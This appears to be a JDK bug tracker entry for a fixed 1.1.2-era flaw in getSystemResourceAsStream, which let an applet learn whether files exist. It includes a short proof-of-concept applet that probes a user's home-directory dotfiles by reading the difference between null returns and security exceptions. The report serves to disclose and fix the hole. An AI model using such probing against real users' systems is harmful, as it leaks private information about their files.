Uploaded image for project: 'JDK'
  1. JDK
  2. JDK-4062427

Security hole in getSystemResourceAsStream call exposes file existence

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: P1
    • Resolution: Fixed
    • Affects Version/s: 1.1.2
    • Fix Version/s: 1.1.4
    • Component/s: core-libs
    • Labels:
    • Subcomponent:
    • Resolved In Build:
      1.1.4
    • CPU:
      sparc
    • OS:
      solaris_2.5.1
    • Verification:
      Not verified

      Description

      The getSystemResourceAsStream call has a security hole in it which
      allows an applet to see whether files exist or not to an applet. If a
      user has "." in their CLASSPATH (which is common for developers) and
      the current directory is a user's home directory (common for web
      browsers launched at startup), it is quite easy.

      Here's a sample program. Put "." in your CLASSPATH and cd to your
      home directory. Then call this applet. It will generate a bunch of
      security exceptions, but will correctly report whether the list of
      files exist or not.

      import java.applet.*;
      import java.io.*;

      public class GetResource extends Applet {

          public void init() {
      report(".cshrc");
      report(".login");
      report(".profile");
      report(".exrc");
      report(".emacs");
          }

          void report(String name) {
      boolean e = exists(name);
      System.err.println(name + ": " + (e ? "yes" : "no"));
          }

          boolean exists(String name) {
      try {
      InputStream i = ClassLoader.getSystemResourceAsStream(name);
      return (i != null);
      } catch (SecurityException ex) {
      return true;
      }
          }
      }

      The problem is that getSystemResourceAsStream in resource.c checks to
      see if the file exists before trying to construct a FileInputStream
      (where the security check is done). Therefore, returning null means
      the file doesn't exist and throwing an exception means that the file
      does exist.

      Alan Bishop
      WebTV Networks, Inc.
      ###@###.###

        Attachments

          Activity

            People

            Assignee:
            rschemersunw Roland Schemers (Inactive)
            Reporter:
            mmuellersunw Marianne Mueller (Inactive)
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved:
              Imported:
              Indexed: